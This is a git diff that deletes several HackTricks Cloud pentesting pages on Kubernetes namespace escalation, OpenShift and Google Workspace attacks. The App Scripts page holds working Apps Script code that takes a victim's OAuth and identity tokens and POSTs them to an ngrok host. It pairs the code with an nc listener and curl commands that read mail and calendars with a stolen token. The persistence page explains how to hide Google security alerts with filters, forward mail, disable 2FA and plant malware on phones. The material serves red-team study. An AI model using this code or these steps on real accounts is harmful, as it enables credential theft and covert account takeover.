- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md b/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md deleted file mode 100644 index de5c06b84..000000000 --- a/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md +++ /dev/null @@ -1,59 +0,0 @@ -# Kubernetes Namespace Escalation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**. - -Here are some techniques you can try to escape to a different namespace: - -### Abuse K8s privileges - -Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens. - -For more info about which privileges you can abuse read: - -{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -### Escape to the node - -If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens: - -* Check for **SAs tokens mounted in other docker containers** running in the node -* Check for new **kubeconfig files in the node with extra permissions** given to the node -* If enabled (or enable it yourself) try to **create mirrored pods of other namespaces** as you might get access to those namespaces default token accounts (I haven't tested this yet) - -All these techniques are explained in: - -{% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert 
(GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/openshift-pentesting/README.md b/pentesting-cloud/openshift-pentesting/README.md deleted file mode 100644 index 8be91bbad..000000000 --- a/pentesting-cloud/openshift-pentesting/README.md +++ /dev/null @@ -1,19 +0,0 @@ -# OpenShift Pentesting - -## Basic Information - -{% content-ref url="openshift-basic-information.md" %} -[openshift-basic-information.md](openshift-basic-information.md) -{% endcontent-ref %} - -## Security Context Constraints - -{% content-ref url="openshift-scc.md" %} -[openshift-scc.md](openshift-scc.md) -{% endcontent-ref %} - -## Privilege Escalation - -{% content-ref url="openshift-privilege-escalation/" %} -[openshift-privilege-escalation](openshift-privilege-escalation/) -{% endcontent-ref %} diff --git a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md b/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md deleted file mode 100644 index 7e5040e3f..000000000 --- a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md +++ /dev/null @@ -1,19 +0,0 @@ -# OpenShift - Privilege Escalation - -## Missing Service Account - -{% content-ref url="openshift-missing-service-account.md" %} -[openshift-missing-service-account.md](openshift-missing-service-account.md) -{% endcontent-ref %} - -## Tekton - -{% content-ref url="openshift-tekton.md" %} -[openshift-tekton.md](openshift-tekton.md) -{% endcontent-ref %} - -## SCC Bypass - -{% content-ref url="openshift-scc-bypass.md" %} -[openshift-scc-bypass.md](openshift-scc-bypass.md) -{% endcontent-ref %} diff --git a/pentesting-cloud/workspace-security/README.md b/pentesting-cloud/workspace-security/README.md deleted file mode 100644 index f974d179b..000000000 --- a/pentesting-cloud/workspace-security/README.md +++ /dev/null 
@@ -1,99 +0,0 @@ -# GWS - Workspace Pentesting - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Entry Points - -### Google Platforms and OAuth Apps Phishing - -Check how you could use different Google platforms such as Drive, Chat, Groups... to send the victim a phishing link and how to perform a Google OAuth Phishing in: - -{% content-ref url="gws-google-platforms-phishing/" %} -[gws-google-platforms-phishing](gws-google-platforms-phishing/) -{% endcontent-ref %} - -### Password Spraying - -In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you could use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) (although it looks unmaintained) which will use AWS lambdas to change IP address. - -## Post-Exploitation - -If you have compromised some credentials or the session of the user you can perform several actions to access potential sensitive information of the user and to try to escala privileges: - -{% content-ref url="gws-post-exploitation.md" %} -[gws-post-exploitation.md](gws-post-exploitation.md) -{% endcontent-ref %} - -### GWS <-->GCP Pivoting - -Read more about the different techniques to pivot between GWS and GCP in: - -{% content-ref url="../gcp-security/gcp-to-workspace-pivoting/" %} -[gcp-to-workspace-pivoting](../gcp-security/gcp-to-workspace-pivoting/) -{% endcontent-ref %} - -## GWS <--> GCPW | GCDS | Directory Sync (AD & EntraID) - -* **GCPW (Google Credential Provider for Windows)**: This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will **store tokens to access Google Workspace** in some places in the PC. -* **GCDS (Google CLoud DIrectory Sync)**: This is a tool that can be used to **sync your active directory users and groups to your Workspace**. The tool requires the **credentials of a Workspace superuser and privileged AD user**. 
So, it might be possible to find it inside a domain server that would be synchronising users from time to time. -* **Admin Directory Sync**: It allows you to synchronize users from AD and EntraID in a serverless process from [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories). - -{% content-ref url="gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/" %} -[gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid](gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/) -{% endcontent-ref %} - -## Persistence - -If you have compromised some credentials or the session of the user check these options to maintain persistence over it: - -{% content-ref url="gws-persistence.md" %} -[gws-persistence.md](gws-persistence.md) -{% endcontent-ref %} - -## Account Compromised Recovery - -* Log out of all sessions -* Change user password -* Generate new 2FA backup codes -* Remove App passwords -* Remove OAuth apps -* Remove 2FA devices -* Remove email forwarders -* Remove emails filters -* Remove recovery email/phones -* Removed malicious synced smartphones -* Remove bad Android Apps -* Remove bad account delegations - -## References - -* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic -* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite? - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md b/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md deleted file mode 100644 index 09b6ffa5b..000000000 --- a/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md +++ /dev/null @@ -1,273 +0,0 @@ -# GWS - App Scripts - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## App Scripts - -App Scripts is **code that will be triggered when a user with editor permission access the doc the App Script is linked with** and after **accepting the OAuth prompt**.\ -They can also be set to be **executed every certain time** by the owner of the App Script (Persistence). - -### Create App Script - -There are several ways to create an App Script, although the most common ones are f**rom a Google Document (of any type)** and as a **standalone project**: - -
- -Create a container-bound project from Google Docs, Sheets, or Slides - -1. Open a Docs document, a Sheets spreadsheet, or Slides presentation. -2. Click **Extensions** > **Google Apps Script**. -3. In the script editor, click **Untitled project**. -4. Give your project a name and click **Rename**. - -
- -
- -Create a standalone project - -To create a standalone project from Apps Script: - -1. Go to [`script.google.com`](https://script.google.com/). -2. Click add **New Project**. -3. In the script editor, click **Untitled project**. -4. Give your project a name and click **Rename**. - -
- -
- -Create a standalone project from Google Drive - -1. Open [Google Drive](https://drive.google.com/). -2. Click **New** > **More** > **Google Apps Script**. - -
- -
- -Create a container-bound project from Google Forms - -1. Open a form in Google Forms. -2. Click More more\_vert > **Script editor**. -3. In the script editor, click **Untitled project**. -4. Give your project a name and click **Rename**. - -
- -
- -Create a standalone project using the clasp command line tool - -`clasp` is a command line tool that allows you create, pull/push, and deploy Apps Script projects from a terminal. - -See the [Command Line Interface using `clasp` guide](https://developers.google.com/apps-script/guides/clasp) for more details. - -
- -## App Script Scenario - -### Create Google Sheet with App Script - -Start by crating an App Script, my recommendation for this scenario is to create a Google Sheet and go to **`Extensions > App Scripts`**, this will open a **new App Script for you linked to the sheet**. - -### Leak token - -In order to give access to the OAuth token you need to click on **`Services +` and add scopes like**: - -* **AdminDirectory**: Access users and groups of the directory (if the user has enough permissions) -* **Gmail**: To access gmail data -* **Drive**: To access drive data -* **Google Sheets API**: So it works with the trigger - -To change yourself the **needed scopes** you can go to project settings and enable: **`Show "appsscript.json" manifest file in editor`.** - -{% code overflow="wrap" %} -```javascript -function getToken() { - var userEmail = Session.getActiveUser().getEmail(); - var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1); - var oauthToken = ScriptApp.getOAuthToken(); - var identityToken = ScriptApp.getIdentityToken(); - - // Data json - data = { - "oauthToken": oauthToken, - "identityToken": identityToken, - "email": userEmail, - "domain": domain - } - - // Send data - makePostRequest(data); - - // Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions - - // To ask for AdminDirectory permissions - var pageToken = ""; - page = AdminDirectory.Users.list({ - domain: domain, // Use the extracted domain - orderBy: 'givenName', - maxResults: 100, - pageToken: pageToken - }); - - // To ask for gmail permissions - var threads = GmailApp.getInboxThreads(0, 10); - - // To ask for drive permissions - var files = DriveApp.getFiles(); -} - - -function makePostRequest(data) { - var url = 'http://5.tcp.eu.ngrok.io:12027'; - - var options = { - 'method' : 'post', - 'contentType': 'application/json', - 'payload' : JSON.stringify(data) - }; - - try { - UrlFetchApp.fetch(url, options); - } catch (e) 
{ - Logger.log("Error making POST request: " + e.toString()); - } -} -``` -{% endcode %} - -To capture the request you can just run: - -```bash -ngrok tcp 4444 -nc -lv 4444 #macOS -``` - -Permissions requested to execute the App Script: - -
- -{% hint style="warning" %} -As an external request is made the OAuth prompt will also **ask to permission to reach external endpoints**. -{% endhint %} - -### Create Trigger - -Once the App is read, click on **⏰ Triggers** to create a trigger. As **function** ro tun choose **`getToken`**, runs at deployment **`Head`**, in event source select **`From spreadsheet`** and event type select **`On open`** or **`On edit`** (according to your needs) and save. - -Note that you can check the **runs of the App Scripts in the Executions tab** if you want to debug something. - -### Sharing - -In order to **trigger** the **App Script** the victim needs to connect with **Editor Access**. - -{% hint style="success" %} -The **token** used to execute the **App Script** will be the one of the **creator of the trigger**, even if the file is opened as Editor by other users. -{% endhint %} - -### Abusing Shared With Me documents - -{% hint style="danger" %} -If someone **shared with you a document with App Scripts and a trigger using the Head** of the App Script (not a fixed deployment), you can modify the App Script code (adding for example the steal token functions), access it, and the **App Script will be executed with the permissions of the user that shared the document with you**! (note that the owners OAuth token will have as access scopes the ones given when the trigger was created). - -A **notification will be sent to the creator of the script indicating that someone modified the script** (What about using gmail permissions to generate a filter to prevent the alert?) -{% endhint %} - -{% hint style="success" %} -If an **attacker modifies the scopes of the App Script** the updates **won't be applied** to the document until a **new trigger** with the changes is created. Therefore, an attacker won't be able to steal the owners creator token with more scopes than the one he set in the trigger he created. 
-{% endhint %} - -### Copying instead of sharing - -When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\ -If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document:** - -
- -If the user copies it an access it both the **contents of the document and the App Scripts will be copied**, however the **triggers are not**, therefore **nothing will be executed**. - -### Sharing as Web Application - -Note that it's also possible to **share an App Script as a Web application** (in the Editor of the App Script, deploy as a Web application), but an alert such as this one will appear: - -
- -Followed by the **typical OAuth prompt asking** for the needed permissions. - -### Testing - -You can test a gathered token to list emails with: - -{% code overflow="wrap" %} -```bash -curl -X GET "https://www.googleapis.com/gmail/v1/users//messages" \ --H "Authorization: Bearer " -``` -{% endcode %} - -List calendar of the user: - -```bash -curl -H "Authorization: Bearer $OAUTH_TOKEN" \ - -H "Accept: application/json" \ - "https://www.googleapis.com/calendar/v3/users/me/calendarList" -``` - -## App Script as Persistence - -One option for persistence would be to **create a document and add a trigger for the the getToken** function and share the document with the attacker so every-time the attacker opens the file he **exfiltrates the token of the victim.** - -It's also possible to create an App Script and make it trigger every X time (like every minute, hour, day...). An attacker that has **compromised credentials or a session of a victim could set an App Script time trigger and leak a very privileged OAuth token every day**: - -Just create an App Script, go to Triggers, click on Add Trigger, and select as event source Time-driven and select the options that better suits you: - -
- -{% hint style="danger" %} -This will create a security alert email and a push message to your mobile alerting about this. -{% endhint %} - -### Shared Document Unverified Prompt Bypass - -Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**. - -{% hint style="warning" %} -This means, that the **creator of the document will appear as creator of any App Script** anyone with editor access creates inside of it. - -This also means that the **App Script will be trusted by the Workspace environment** of the creator of the document. -{% endhint %} - -{% hint style="danger" %} -This also means that if an **App Script already existed** and people have **granted access**, anyone with **Editor** permission on the doc can **modify it and abuse that access.**\ -To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `` tags). -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/workspace-security/gws-persistence.md b/pentesting-cloud/workspace-security/gws-persistence.md deleted file mode 100644 index d4b446fd1..000000000 --- a/pentesting-cloud/workspace-security/gws-persistence.md +++ /dev/null @@ -1,210 +0,0 @@ -# GWS - Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -{% hint style="danger" %} -All the actions mentioned in this section that change setting will generate a **security alert to the email and even a push notification to any mobile synced** with the account. -{% endhint %} - -## **Persistence in Gmail** - -* You can create **filters to hide** security notifications from Google - * `from: (no-reply@accounts.google.com) "Security Alert"` - * This will prevent security emails to reach the email (but won't prevent push notifications to the mobile) - -
- -Steps to create a gmail filter - -(Instructions from [**here**](https://support.google.com/mail/answer/6579)) - -1. Open [Gmail](https://mail.google.com/). -2. In the search box at the top, click Show search options ![photos tune](https://lh3.googleusercontent.com/cD6YR_YvqXqNKxrWn2NAWkV6tjJtg8vfvqijKT1_9zVCrl2sAx9jROKhLqiHo2ZDYTE=w36) . -3. Enter your search criteria. If you want to check that your search worked correctly, see what emails show up by clicking **Search**. -4. At the bottom of the search window, click **Create filter**. -5. Choose what you’d like the filter to do. -6. Click **Create filter**. - -Check your current filter (to delete them) in [https://mail.google.com/mail/u/0/#settings/filters](https://mail.google.com/mail/u/0/#settings/filters) - -
- -
- -* Create **forwarding address to forward sensitive information** (or everything) - You need manual access. - * Create a forwarding address in [https://mail.google.com/mail/u/2/#settings/fwdandpop](https://mail.google.com/mail/u/2/#settings/fwdandpop) - * The receiving address will need to confirm this - * Then, set to forward all the emails while keeping a copy (remember to click on save changes): - -
- -It's also possible create filters and forward only specific emails to the other email address. - -## App passwords - -If you managed to **compromise a google user session** and the user had **2FA**, you can **generate** an [**app password**](https://support.google.com/accounts/answer/185833?hl=en) (follow the link to see the steps). Note that **App passwords are no longer recommended by Google and are revoked** when the user **changes his Google Account password.** - -**Even if you have an open session you will need to know the password of the user to create an app password.** - -{% hint style="info" %} -App passwords can **only be used with accounts that have 2-Step Verification** turned on. -{% endhint %} - -## Change 2-FA and similar - -It's also possible to **turn off 2-FA or to enrol a new device** (or phone number) in this page [**https://myaccount.google.com/security**](https://myaccount.google.com/security)**.**\ -**It's also possible to generate passkeys (add your own device), change the password, add mobile numbers for verification phones and recovery, change the recovery email and change the security questions).** - -{% hint style="danger" %} -To **prevent security push notifications** to reach the phone of the user, you could **sign his smartphone out** (although that would be weird) because you cannot sign him in again from here. - -It's also possible to **locate the device.** -{% endhint %} - -**Even if you have an open session you will need to know the password of the user to change these settings.** - -## Persistence via OAuth Apps - -If you have **compromised the account of a user,** you can just **accept** to grant all the possible permissions to an **OAuth App**. 
The only problem is that Workspace can be configure to **disallow unreviewed external and/or internal OAuth apps.**\ -It is pretty common for Workspace Organizations to not trust by default external OAuth apps but trust internal ones, so if you have **enough permissions to generate a new OAuth application** inside the organization and external apps are disallowed, generate it and **use that new internal OAuth app to maintain persistence**. - -Check the following page for more information about OAuth Apps: - -{% content-ref url="gws-google-platforms-phishing/" %} -[gws-google-platforms-phishing](gws-google-platforms-phishing/) -{% endcontent-ref %} - -## Persistence via delegation - -You can just **delegate the account** to a different account controlled by the attacker (if you are allowed to do this). In Workspace **Organizations** this option must be **enabled**. It can be disabled for everyone, enabled from some users/groups or for everyone (usually it's only enabled for some users/groups or completely disabled). - -
- -If you are a Workspace admin check this to enable the feature - -(Information [copied form the docs](https://support.google.com/a/answer/7223765)) - -As an administrator for your organization (for example, your work or school), you control whether users can delegate access to their Gmail account. You can let everyone have the option to delegate their account. Or, only let people in certain departments set up delegation. For example, you can: - -* Add an administrative assistant as a delegate on your Gmail account so they can read and send email on your behalf. -* Add a group, such as your sales department, in Groups as a delegate to give everyone access to one Gmail account. - -Users can only delegate access to another user in the same organization, regardless of their domain or their organizational unit. - -#### Delegation limits & restrictions - -* **Allow users to grant their mailbox access to a Google group** option: To use this option, it must be enabled for the OU of the delegated account and for each group member's OU. Group members that belong to an OU without this option enabled can't access the delegated account. -* With typical use, 40 delegated users can access a Gmail account at the same time. Above-average use by one or more delegates might reduce this number. -* Automated processes that frequently access Gmail might also reduce the number of delegates who can access an account at the same time. These processes include APIs or browser extensions that access Gmail frequently. -* A single Gmail account supports up to 1,000 unique delegates. A group in Groups counts as one delegate toward the limit. -* Delegation does not increase the limits for a Gmail account. Gmail accounts with delegated users have the standard Gmail account limits and policies. For details, visit [Gmail limits and policies](https://support.google.com/a/topic/28609). 
- -#### Step 1: Turn on Gmail delegation for your users - -**Before you begin:** To apply the setting for certain users, put their accounts in an [organizational unit](https://support.google.com/a/topic/1227584). - -1. [Sign in](https://admin.google.com/) to your [Google Admin console](https://support.google.com/a/answer/182076). - - Sign in using an _administrator account_, not your current account CarlosPolop@gmail.com -2. In the Admin console, go to Menu ![](https://storage.googleapis.com/support-kms-prod/JxKYG9DqcsormHflJJ8Z8bHuyVI5YheC0lAp)![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)![](https://storage.googleapis.com/support-kms-prod/ocGtUSENh4QebLpvZcmLcNRZyaTBcolMRSyl) **Apps**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Google Workspace**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Gmail**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**User settings**. -3. To apply the setting to everyone, leave the top organizational unit selected. Otherwise, select a child [organizational unit](https://support.google.com/a/topic/1227584). -4. Click **Mail delegation**. -5. Check the **Let users delegate access to their mailbox to other users in the domain** box. -6. (Optional) To let users specify what sender information is included in delegated messages sent from their account, check the **Allow users to customize this setting** box. -7. Select an option for the default sender information that's included in messages sent by delegates: - * **Show the account owner and the delegate who sent the email**—Messages include the email addresses of the Gmail account owner and the delegate. - * **Show the account owner only**—Messages include the email address of only the Gmail account owner. The delegate email address is not included. -8. 
(Optional) To let users add a group in Groups as a delegate, check the **Allow users to grant their mailbox access to a Google group** box. -9. Click **Save**. If you configured a child organizational unit, you might be able to **Inherit** or **Override** a parent organizational unit's settings. -10. (Optional) To turn on Gmail delegation for other organizational units, repeat steps 3–9. - -Changes can take up to 24 hours but typically happen more quickly. [Learn more](https://support.google.com/a/answer/7514107) - -#### Step 2: Have users set up delegates for their accounts - -After you turn on delegation, your users go to their Gmail settings to assign delegates. Delegates can then read, send, and receive messages on behalf of the user. - -For details, direct users to [Delegate and collaborate on email](https://support.google.com/a/users/answer/138350). - -
- -
- -From a regular suer, check here the instructions to try to delegate your access - -(Info copied [**from the docs**](https://support.google.com/mail/answer/138350)) - -You can add up to 10 delegates. - -If you're using Gmail through your work, school, or other organization: - -* You can add up to 1000 delegates within your organization. -* With typical use, 40 delegates can access a Gmail account at the same time. -* If you use automated processes, such as APIs or browser extensions, a few delegates can access a Gmail account at the same time. - -1. On your computer, open [Gmail](https://mail.google.com/). You can't add delegates from the Gmail app. -2. In the top right, click Settings ![Settings](https://lh3.googleusercontent.com/p3J-ZSPOLtuBBR_ofWTFDfdgAYQgi8mR5c76ie8XQ2wjegk7-yyU5zdRVHKybQgUlQ=w36-h36) ![and then](https://lh3.googleusercontent.com/3_l97rr0GvhSP2XV5OoCkV2ZDTIisAOczrSdzNCBxhIKWrjXjHucxNwocghoUa39gw=w36-h36) **See all settings**. -3. Click the **Accounts and Import** or **Accounts** tab. -4. In the "Grant access to your account" section, click **Add another account**. If you’re using Gmail through your work or school, your organization may restrict email delegation. If you don’t see this setting, contact your admin. - * If you don't see Grant access to your account, then it's restricted. -5. Enter the email address of the person you want to add. If you’re using Gmail through your work, school, or other organization, and your admin allows it, you can enter the email address of a group. This group must have the same domain as your organization. External members of the group are denied delegation access.\ - \ - **Important:** If the account you delegate is a new account or the password was reset, the Admin must turn off the requirement to change password when you first sign in. - - * [Learn how an Admin can create a user](https://support.google.com/a/answer/33310). 
- * [Learn how an Admin can reset passwords](https://support.google.com/a/answer/33319). - - 6\. Click **Next Step** ![and then](https://lh3.googleusercontent.com/QbWcYKta5vh_4-OgUeFmK-JOB0YgLLoGh69P478nE6mKdfpWQniiBabjF7FVoCVXI0g=h36) **Send email to grant access**. - - The person you added will get an email asking them to confirm. The invitation expires after a week. - - If you added a group, all group members will become delegates without having to confirm. - - Note: It may take up to 24 hours for the delegation to start taking effect. - -
- -## Persistence via Android App - -If you have a **session inside victims google account** you can browse to the **Play Store** and might be able to **install malware** you have already uploaded to the store directly **to the phone** to maintain persistence and access the victims phone. - -## **Persistence via** App Scripts - -You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**. For more information about how to do this check: - -{% content-ref url="gws-google-platforms-phishing/gws-app-scripts.md" %} -[gws-app-scripts.md](gws-google-platforms-phishing/gws-app-scripts.md) -{% endcontent-ref %} - -## References - -* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic -* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite? - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md b/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md deleted file mode 100644 index 30bbf4d6a..000000000 --- a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md +++ /dev/null @@ -1,87 +0,0 @@ -# GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
